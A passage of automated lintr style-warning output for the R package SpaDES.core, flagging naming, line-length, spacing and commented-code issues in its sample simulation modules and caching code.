^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/b47e30f6734bf35b09159775f1ff8a09a9b5e892/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                